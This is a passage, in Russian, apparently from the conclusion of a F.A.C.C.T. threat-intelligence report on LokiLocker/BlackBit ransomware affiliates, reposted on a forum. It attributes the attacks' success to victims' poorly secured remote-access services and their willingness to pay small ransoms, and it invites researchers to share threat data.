Партнеры LokiLocker / BlackBit не показывают в атаках сложных и новаторских методов. Успех атак во многом связан с небрежным отношением жертв к безопасности своих внешних сервисов удаленного доступа. Программы-вымогатели LokiLocker / BlackBit хорошо известны антивирусным продуктам и другим средствам защиты, но и это не спасает от шифрования данных с помощью этих программ.

Многие пострадавшие организации легко соглашаются на выплату небольших сумм выкупа за расшифровку ключевых хостов своей сети и быстрое восстановление ИТ-инфраструктуры. После этого, отделавшись легким испугом, они лишь формально улучшают ситуацию с безопасностью своего периметра от киберугроз. В будущем можно ожидать, что такие организации могут стать жертвой более продвинутых преступников с суммами выкупа совсем другого уровня.

Очевидно, что история вымогателей будет продолжаться до тех пор, пока есть условия для проведения подобных атак, жертвы, готовые платить злоумышленникам выкуп, а также возможность получения злоумышленниками этого выкупа с помощью анонимных транзакций.

Поскольку миссия F.A.C.C.T. — это борьба с киберпреступностью и защита наших клиентов в киберпространстве, мы считаем своей обязанностью делиться своими открытиями с сообществом по кибербезопасности и призываем исследователей совместно изучать сложные угрозы, обмениваться данными и использовать наши технологии, как инструмент борьбы со злоумышленниками.

www.facct.ru
 
Последнее редактирование модератором:
Назад
Сверху Снизу